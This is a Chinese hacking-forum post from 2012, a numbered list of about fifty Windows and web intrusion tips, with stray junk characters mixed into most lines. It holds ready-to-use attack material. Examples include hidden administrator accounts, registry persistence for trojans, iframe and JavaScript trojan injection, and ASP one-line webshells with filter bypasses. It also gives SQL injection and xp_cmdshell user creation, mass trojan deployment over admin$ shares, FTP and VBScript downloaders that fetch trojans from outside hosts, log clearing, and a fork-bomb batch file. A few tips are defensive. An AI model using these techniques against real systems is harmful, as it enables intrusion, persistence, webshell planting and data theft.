找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2353|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,$ _/ M. h2 F0 w4 T  O! E, R
cacls C:\windows\system32 /G hqw20:R2 f; o% r2 t$ \
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入. a: L" A" e, o( Z8 a7 d- I( b
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
# D  S* {( ^) R' o/ W5 T
; ?5 q" G6 F0 C. b' b9 `0 C) v, m2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
( t* v. s7 f- k( W4 z, q  k1 n3 Z; t
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。2 y. A* E, P  ~+ [
! P8 u5 D% a3 F3 ?; r
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# x; b1 ?/ k1 K# }/ \+ U3 Q7 M4 O3 z! b: v  {8 l+ J/ K' z- ~
5、利用INF文件来修改注册表& ]2 p; @8 r5 f& @. d% [0 f
[Version]4 ?- U6 @$ r6 i" H
Signature="$CHICAGO$") g  ]7 v9 t$ b
[Defaultinstall]
$ V8 Q- h. j( T6 e; P  m# laddREG=Ating+ ^( c) k6 {# D% U
[Ating]: o6 K9 ?# f7 Z0 t
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
2 Q1 u' r% X5 H- U- F+ O3 k/ z以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:! x! s- B4 d* |* s4 a) {
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径! q% Q6 r$ Z& ~4 N
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
4 A; [  j* x5 `' u) g: I% ZHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% M  ~" J+ |' H+ yHKEY_CURRENT_CONFIG 简写为 HKCC
" a$ W+ b8 k8 j0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值& e6 \$ T, ?1 i# f( i1 m! T9 Z* q3 o1 X
"1"这里代表是写入或删除注册表键值中的具体数据8 }) ]0 c1 z0 Y2 T( Z& b9 u- n5 Y

! _  }  C: T4 e6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,' M0 n. ?+ L! [$ Z1 w5 X& Y, E
多了一步就是在防火墙里添加个端口,然后导出其键值
7 Z9 l& L3 Y0 d  C[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]; p# M& @! @8 r+ L
3 P& C6 J) X6 X. G9 d
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽* l# C8 m" h3 R& Y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。! U$ e6 X1 A5 @

( |9 e$ @, a/ g8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. X$ q1 G' Q8 H: r, c' w$ Z) h* \' y* I4 m/ q, I9 x3 Z5 i
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,% R0 ^3 G- Y4 g
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
# T' K" C; W, f5 @
, [/ P4 ?5 y% K& A3 Z10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”! n) x; ~6 F. y2 j+ |
5 x8 y* h" E7 s5 u6 Q9 y, w
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,+ y. w  A3 {# r( b' g" d
用法:xsniff –pass –hide –log pass.txt0 o% v( X- X) [+ W4 a  A# c

$ x* @' _( X, d# o5 m12、google搜索的艺术
7 n7 w4 W7 k* ]3 O) u) k搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
. ~% S( O8 w( R' G  T. i或“字符串的语法错误”可以找到很多sql注入漏洞。
+ O2 D& p" J+ n8 |+ [, [
  l9 _/ N, e. V5 i4 h4 x9 k" G13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。: x1 w1 a, k& t) y. w
1 D: I  K$ z+ X! k* k* P
14、cmd中输入 nc –vv –l –p 1987
- \, g# S0 y3 L. ]2 y9 Z" |5 ~做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃: t- ^+ P8 N2 Y. [/ O( f, ~) t
' H5 V* u1 A, _7 }1 L& e6 F. N2 I
15、制作T++木马,先写个ating.hta文件,内容为
' m1 D% [+ O  j7 Q1 \9 ~<script language="VBScript">8 s# Z0 U6 Q7 g" T* Q. o; T
set wshshell=createobject ("wscript.shell" )0 v/ a; w( _" @, c" @/ b/ }
a=wshshell.run("你马的名称",1)
$ J6 A" a- F# S) p& H; C  Uwindow.close
5 O# p9 I; N. g  C</script>9 }' i' i8 L7 @% {; o- W/ Q
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。: X& s( k. m  L$ T! f' s
) {/ i* ]+ A  c+ h
16、搜索栏里输入
! U0 a4 ~/ \& {! d5 e: z关键字%'and 1=1 and '%'='
$ |; z5 I2 n/ l- o! \5 |. i关键字%'and 1=2 and '%'='8 ~8 F: e9 `2 o3 |( H9 n) @2 i5 E
比较不同处 可以作为注入的特征字符
3 K" i2 I& p3 D7 ^, N3 I; e3 x0 F3 u& y  p" |/ E# I6 e. h" _
17、挂马代码<html>
$ w" \; u- v+ K) C3 ?<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>3 p0 q0 e, n" j( U: @5 O/ @" E
</html>% k2 I, b; T* m& [6 D

* k3 k" @. |+ z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
' h2 \' p. N8 Mnet localgroup administrators还是可以看出Guest是管理员来。
0 c- n) L" U& L3 m$ w/ N& X! H! a9 B% ]% e: f  g- _- O; G5 o( M
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( t7 U5 q& Z' a6 p' F- M! y$ A# O
用法: 安装: instsrv.exe 服务名称 路径( h$ ?4 y6 E" Z1 ~4 I
卸载: instsrv.exe 服务名称 REMOVE
0 A9 c' d$ X0 Q& ?# t7 X
  C/ @% n  x( |5 v! b1 o7 x* c) G% p* P. c9 o! _) i
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉( j1 P" u0 C. l! k) Q
不能注入时要第一时间想到%5c暴库。
7 C6 J" [( g; ~+ W. s( z! ?% c- w
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~) F' z. Y. P" z7 ?- m

. [# r) }' ]2 Y/ d8 t2 o/ Y23、缺少xp_cmdshell时
. [! y/ M& k8 j尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'- j: ~3 Z- }/ W- `0 k- ]8 {
假如恢复不成功,可以尝试直接加用户(针对开3389的)
* J' c2 f7 @! Z" Kdeclare @o int
2 f3 r7 I8 e8 P0 x. Z8 q0 w% zexec sp_oacreate 'wscript.shell',@o out- @1 h( P5 g5 ^$ A4 I0 D
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' A# p4 w! R2 g, W1 V  W5 |) c- o- w5 s' G/ u6 O, g* Z) O5 n
24.批量种植木马.bat9 b) C' r% c5 r9 t1 y/ u
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
" |: x( V) t) o0 C0 k# I2 afor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间) G; A3 v- t' I# j
扫描地址.txt里每个主机名一行 用\\开头# ?' t  @# b2 _6 K0 u

# q6 Q% B; d* z# c; I25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
, w9 T7 m/ v9 {3 A8 X8 }8 o4 Z  O. U+ r% M. v6 ^" w
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
. H" S0 d: x6 Q3 l将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
! X1 L9 U4 ~( {+ u& A% Y2 A.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& N2 o2 V& g# I$ ]
; @9 Z5 N$ o% a9 [27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 Y! A+ s$ X* e3 t然后用#clear logg和#clear line vty *删除日志+ l) ]5 ^( M* [+ s5 V6 s# H

# ^6 @6 B; A' M3 U/ A9 V, F5 y28、电脑坏了省去重新安装系统的方法! W4 F2 B/ g3 E8 P/ M" s( N
纯dos下执行,
9 u# Z# ^/ j6 f" vxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
+ a  O4 C1 A, P/ @8 @5 m: P2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
) j" o( Q- J) u
4 n% o7 Y) u# W4 L29、解决TCP/IP筛选 在注册表里有三处,分别是:
" Z% X" X7 n3 Y6 d& `HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip- G9 o) b( t/ R
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ N: [  T% P! pHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" r$ H$ u$ G3 o( a* T4 k
分别用
. G' T! z) r* Z+ j- {regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 j1 ^$ z9 f2 q
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( p. Y! n- o$ m  H6 @- p: Yregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 e$ ^' c8 W) X: n, [& a" e命令来导出注册表项
' a. s. L/ }) e1 g0 @  h. d然后把三个文件里的EnableSecurityFilters"=dword:00000001,; l+ v: x4 A$ Y5 m
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
# v8 c( i. v0 t) O1 Q, D& U4 F. p  F) \regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
+ L* m; ^* Y2 x; U  K2 M  `1 E3 `+ S! X3 ?  C& n- ^3 S
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( S# j: V  N* c5 g7 R& RSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
' r8 Y( b  G9 w2 G4 ?: @) ~  K' {( B
31、全手工打造开3389工具# E  S$ `7 Y' l* X2 d  T
打开记事本,编辑内容如下:
: c: \+ x% n/ e, @2 [8 Vecho [Components] > c:\sql
( e: Z4 w; G, ~3 wecho TSEnable = on >> c:\sql4 [; h; \, X) ?5 O4 ?/ H
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' g! ?! R, }/ y1 J
编辑好后存为BAT文件,上传至肉鸡,执行  s: b0 |: X' E+ C& \

* N  u' n$ T* I" G$ B3 A32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马- X- [' f5 D# T- m; n, X& F2 d; o

6 Y7 R, H% H4 G) E. e33、让服务器重启
! G' L& p% W  [  C写个bat死循环:
" {  i) [& e! l* E@echo off8 G- t' @$ E) J" r! Y, o
:loop1
4 t4 N( V- L& X9 m* p' Scls/ A% u. l' S1 p3 z8 Y
start cmd.exe
/ ~  j& ~/ k( U! v& k3 S8 y) ygoto loop1* w, b# O8 F) N$ ~
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启6 d2 `2 |6 x  }! N3 Z0 w" L! ^( l* D

( p: k( B: s& n6 W( b$ |' a3 G34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,6 l( k9 K( D1 S# {
@echo off
5 w4 m! V0 e1 u0 ]9 i% Tdate /t >c:/3389.txt* K& P1 H# f, j" L
time /t >>c:/3389.txt4 ^' L5 u* r' |+ r% S
attrib +s +h c:/3389.bat
/ n8 u# g0 u+ m# kattrib +s +h c:/3389.txt" Z7 _5 d$ [$ V% n: h
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ l, m7 ^( y8 e* p& e8 q: p并保存为3389.bat" w7 y+ D9 k- c% M
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号' q# a* i/ D  Z$ `/ p

" [0 E3 a3 m3 d4 G35、有时候提不了权限的话,试试这个命令,在命令行里输入:* t9 S& i2 f) k( m' ^8 c' M" m
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
. m- l9 h0 N7 r8 \0 b输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。9 I( `8 b( i3 i* ~1 ^9 N9 Y4 s
; G) H3 j/ r. m& F$ x
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件4 d3 \* U  s8 @
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 J! C; @/ l4 n% u6 M% p$ [6 X5 ~echo 你的FTP账号 >>c:\1.bat //输入账号. L+ M; {$ ]8 w9 e3 n* T0 N- _
echo 你的FTP密码 >>c:\1.bat //输入密码, y  c* r5 L3 k+ y* l. |5 T
echo bin >>c:\1.bat //登入- N1 C  j% L- B. J# q
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
0 Z! o! ?& Y$ ^3 a: z5 Vecho bye >>c:\1.bat //退出
/ F: ?- E& R# g. e5 T' Y5 `然后执行ftp -s:c:\1.bat即可# u2 i2 _9 w! Z& S) ^, r0 S$ _8 s; k

9 B8 J7 v( Y6 h  j5 |37、修改注册表开3389两法; g# ~- d4 S: v, T
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表4 I; d$ l. F( A) _) t) |( t& o
echo Windows Registry Editor Version 5.00 >>3389.reg
1 p5 a$ t6 J" F9 U' b' S5 g) @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg. L* Q; {7 L% N1 {
echo "Enabled"="0" >>3389.reg- \. ^" D- V. S& H/ q) X( M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows5 L: |4 O& A! P0 @) N
NT\CurrentVersion\Winlogon] >>3389.reg1 G8 ]+ p+ [( I8 e! n& M
echo "ShutdownWithoutLogon"="0" >>3389.reg- [7 G% U4 u4 e7 U0 V8 H8 l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer], E; u% h/ b) K! B
>>3389.reg8 c" ]( Z2 C& l/ ~; l
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. E' Z! Y! {7 E0 C( O9 j& ]+ H9 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]9 i- k$ O8 F6 Y: `; n, g# f: s
>>3389.reg  [6 C+ M) e! Z8 m2 b
echo "TSEnabled"=dword:00000001 >>3389.reg
- l' x8 g$ g3 O6 A+ Z. Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg# F' m* t# ^, O
echo "Start"=dword:00000002 >>3389.reg9 M% U  u, n$ K0 e  C; b" t. \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]* e) U' J) |) O4 t
>>3389.reg; x4 o3 V/ J0 ]7 n
echo "Start"=dword:00000002 >>3389.reg
6 E/ }5 n* c/ necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
& p8 }* N% V6 v6 t+ Z2 \echo "Hotkey"="1" >>3389.reg& k! W8 D: i. Y6 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 r9 ~1 I7 k0 @3 Q9 D1 n
Server\Wds\rdpwd\Tds\tcp] >>3389.reg0 P8 N+ V9 ^8 E9 I) p  S8 t5 k
echo "PortNumber"=dword:00000D3D >>3389.reg( I: D& n4 @6 J- B% v: ~4 Y$ p; {* S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 S% Y: ^( W2 f' H$ N8 D7 N
Server\WinStations\RDP-Tcp] >>3389.reg
& c& @7 V, M  G5 ?: J9 b' K3 o* c* t9 cecho "PortNumber"=dword:00000D3D >>3389.reg
9 w# _, p. Z" u4 T% T把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
- N/ s  M% b: L  h(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)6 R. D3 V$ y+ Y  Z. S% z4 K
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
: t! W* L1 k& |$ D  P(2)winxp和win2003终端开启
4 y- o6 d: b, N4 N0 P& D+ t. |用以下ECHO代码写一个REG文件:
0 K7 Y" D' _$ r) z* jecho Windows Registry Editor Version 5.00>>3389.reg- {; Z) J) L1 T+ k# m4 x" q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 B- u. `+ B8 T% s* ?4 O
Server]>>3389.reg
4 s6 ?) b; ?! f& R4 l: o# {: l( jecho "fDenyTSConnections"=dword:00000000>>3389.reg
2 C5 G& S# K0 y7 J4 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 J! n, e. s$ T- s  d; TServer\Wds\rdpwd\Tds\tcp]>>3389.reg8 f. ]; V5 m( i
echo "PortNumber"=dword:00000d3d>>3389.reg0 \5 H) M0 p- t( B" k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal  p- t+ y8 T$ B* B! H
Server\WinStations\RDP-Tcp]>>3389.reg
/ u+ z' t! i" K9 v  eecho "PortNumber"=dword:00000d3d>>3389.reg
! \5 T; d% S+ t) V然后regedit /s 3389.reg del 3389.reg
" n$ S. v9 P6 ^1 x, g8 eXP下不论开终端还是改终端端口都不需重启
+ u6 a4 s* u7 [( F- h- W' @/ O/ D% ^1 `$ |
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
9 A7 j' g) T1 x0 ?- O- M用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ L, B8 _( p, {- a% c7 B% [2 |; O$ C+ y5 t( N; `2 G2 P, r
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
$ q- m: H- q4 {* R! d9 S: d(1)数据库文件名应复杂并要有特殊字符1 H3 P7 y5 l8 F; o4 W! {* I
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 r  q5 S' ]/ V( o3 v/ }2 d- A, g将conn.asp文档中的; ~; ^) W) P1 g: I9 `* v4 W' d6 z( r
DBPath = Server.MapPath("数据库.mdb")
0 [; i; Y) g4 F) Vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
9 _0 R+ O  z* ?( F, M/ E. M" v. T
/ A0 b, J+ u6 Z& l, [% z) {+ K修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置% N$ Q' M6 o/ B( F
(3)不放在WEB目录里
2 Y) C  p; ]% H! l0 |
0 u3 q9 |9 G2 E: U40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉* J, e7 g. [( q  T$ k
可以写两个bat文件1 J+ r* P3 T# ~2 x
@echo off2 N: q) U2 |0 J4 K, U; j2 w1 {9 F
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe) K9 z( Z8 d9 M2 ~% ?4 y
@del c:\winnt\system32\query.exe, m6 S, G' J5 v. [' W  n
@del %SYSTEMROOT%\system32\dllcache\query.exe' R! g& K+ m" `
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的' Z7 I! w9 w- w- h* B  }

0 `" e$ w9 d& N. B@echo off
# c5 l$ f# E1 o; f, [@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
5 n7 Q* E* A$ v( ], t% H@del c:\winnt\system32\tsadmin.exe
, B. K/ o$ D+ n. a. U# F, l@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex' e4 W1 m( G% z; M/ a$ _

& R6 V2 u& g8 [0 T6 S41、映射对方盘符
# C. \: ]3 p0 W2 r7 ltelnet到他的机器上,
6 w* k, ]/ [' _* l6 ^net share 查看有没有默认共享 如果没有,那么就接着运行& }# g- b1 f9 E3 c3 G: d
net share c$=c:
/ b7 g! p4 @/ V' mnet share现在有c$  j% g9 X1 `5 P% y% h
在自己的机器上运行+ J' U: M; |5 m6 ^- d: O* ~- f
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
0 E" m( Z' f; R. Z3 H
; Y* Y% G. r3 H0 r* |; \; {42、一些很有用的老知识. e$ i0 d9 S0 H1 g8 S3 J
type c:\boot.ini ( 查看系统版本 )) [. V* w8 L" `2 J  D4 ]; D
net start (查看已经启动的服务)
- m% \- i3 `1 P! |" O# f8 i+ ?query user ( 查看当前终端连接 ). z& W! D# e! O) T2 f. }
net user ( 查看当前用户 ). ^+ P- W7 Q/ z/ I8 I8 i5 V* E
net user 用户 密码/add ( 建立账号 )6 [- m% ]9 y8 H) A) \7 B; @6 N0 W4 Y
net localgroup administrators 用户 /add (提升某用户为管理员)" g( f( J. ^1 F2 Z, T. @
ipconfig -all ( 查看IP什么的 )
' M. B9 L9 Y5 A- Hnetstat -an ( 查看当前网络状态 )
* t) f$ Y/ l7 y9 r2 f0 S! Dfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
3 o4 v0 Y5 W  A1 N克隆时Administrator对应1F4  I. k, f! v: k. A* Q9 E
guest对应1F5
' w9 U# V& w" V9 o, F2 Z1 ^7 i! Stsinternetuser对应3E8! Z) w( P/ D4 [& w9 A

/ r7 _5 v0 q. q7 b3 {43、如果对方没开3389,但是装了Remote Administrator Service
0 h  Y' O* h$ I$ p. J# V用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接5 r* Y7 u3 t5 v. F2 S% v
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息" ~) H! c% f# ~8 [: |  S! A# C
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"; E3 I) L# G! v9 {
" f4 V4 \- X* e! o1 s* z$ l& I: ^
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
2 F3 k( d+ n7 w! y' z本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
3 N: R( o: O: y) x- K" C8 U* d2 q! h& s5 V
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)8 u7 }( j9 I# x( T& B
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
; y$ {4 L8 F$ f1 s; J; i1 S^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
, D( U1 y' t0 t& [' p; K- @" mCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
2 b  D2 Z4 z. L9 a; k) ]  N( j1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
2 g1 G6 t% g$ P+ B3 P2 A& h(这是完整的一句话,其中没有换行符), |% W% D3 h: i0 R
然后下载:; ^! J+ m9 t. q
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
8 ~! F% M" `0 y1 t/ K. u) [' {9 c' F3 u. Y# B
46、一句话木马成功依赖于两个条件:
2 e9 c* t4 K1 O. H6 t1、服务端没有禁止adodb.Stream或FSO组件' Z- H& R0 X# r5 }6 I
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 a1 m" P% E* i$ L; {% x1 S: z
- w9 j6 ^, h5 k4 K" S47、利用DB_OWNER权限进行手工备份一句话木马的代码:
+ n( S. h  p# X9 X; y5 h- W;alter database utsz set RECOVERY FULL--
- b# t& t1 J) \' Y;create table cmd (a image)--( p' [$ m2 t* e
;backup log utsz to disk = 'D:\cmd' with init--9 ]- d, V6 O! i
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--+ b. E; c* c0 |, n4 p  G
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: V! E" s+ m. [% |
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。0 v% o, R& F- v2 i3 D9 S
4 V$ y! P4 L) Z% k" H* M
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:$ Z6 V' J) g; e

  g( W. ?/ V$ G! \' r' k* g) ~用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options+ [& d" V0 Y$ |- o2 C. a3 t% y1 z: w' a
所有会话用 'all'。
' r& l9 J5 U1 S-s sessionid 列出会话的信息。3 r' }6 d$ z8 C
-k sessionid 终止会话。
/ y; u2 V# W/ ?8 h7 b) ?( _-m sessionid 发送消息到会话。
/ x. @5 ]9 ~% ^  I9 u; P' f9 B) I: E+ @& L
config 配置 telnet 服务器参数。
8 Z, d9 G1 p  p8 d! T4 W
2 y! j# M( q# O0 I8 Scommon_options 为:
8 j5 j. i; Z; ?-u user 指定要使用其凭据的用户8 [2 M: m" K* u8 H# C" w
-p password 用户密码
, ^0 e9 `! B/ S0 s7 z9 l8 C
* v  k9 q* _7 aconfig_options 为:
- J  m* y. j4 o& }2 [/ k7 G) qdom = domain 设定用户的默认域8 N; q% Q. ^) V
ctrlakeymap = yes|no 设定 ALT 键的映射: k: g" P. U: i3 d) p& h
timeout = hh:mm:ss 设定空闲会话超时值; S' x' L$ W$ S8 S" U9 C. F+ C! g2 T
timeoutactive = yes|no 启用空闲会话。4 {3 i0 c- a3 {) V4 p
maxfail = attempts 设定断开前失败的登录企图数。
. z1 \1 h7 X  n6 b8 z% e0 Amaxconn = connections 设定最大连接数。
) C$ ^9 j  U1 q) t5 Mport = number 设定 telnet 端口。
  i; a2 q- d9 v+ O+ G5 N% a9 G; @% _sec = [+/-]NTLM [+/-]passwd0 S5 t6 P0 j! \
设定身份验证机构
  [9 _: l+ B/ d% hfname = file 指定审计文件名。9 T. t. t# i( T! \* N
fsize = size 指定审计文件的最大尺寸(MB)。2 S& x# Y" F" k  o, Y, i; k
mode = console|stream 指定操作模式。9 q3 {6 R+ E7 J! h  }/ k; N
auditlocation = eventlog|file|both
8 O+ o* R2 i8 W指定记录地点
( }. U; A: w9 W1 k* Z6 vaudit = [+/-]user [+/-]fail [+/-]admin8 Y: S- y# z9 v6 X1 H4 H& m

5 }6 }2 j; C% S! a! U49、例如:在IE上访问:0 r  q7 Q0 R& Y+ Q# |/ T
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
) v5 B. H9 r* [* U* g, H% Y: H/ [hack.txt里面的代码是:: z) \# D$ F% `* _
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
1 j  f/ I% l8 W+ P/ F7 h把这个hack.txt发到你空间就可以了!
, m& J8 \% v! a5 g4 h& P这个可以利用来做网马哦!; ~1 G/ Z$ H6 ~/ d3 h$ n
2 B3 U. I9 `* C/ ~) O( e' V7 ?3 l
50、autorun的病毒可以通过手动限制!! e" q/ d! P/ Q% ~$ m
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!8 H; [0 z# M1 B9 k. f$ |3 G
2,打开盘符用右键打开!切忌双击盘符~
7 j  [% ^* ?9 L1 o3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
1 q  ~5 D! L2 A+ r) P( n! b( i* `; R- v/ n3 q/ V0 L7 N1 N
51、log备份时的一句话木马:
& ?8 Q2 A) ~: qa).<%%25Execute(request("go"))%%25>
: S3 T' G, z) sb).<%Execute(request("go"))%>9 B; l: s( x* W# i0 A) i
c).%><%execute request("go")%><%
$ v( k3 @6 z, C: `( Cd).<script language=VBScript runat=server>execute request("sb")</Script>
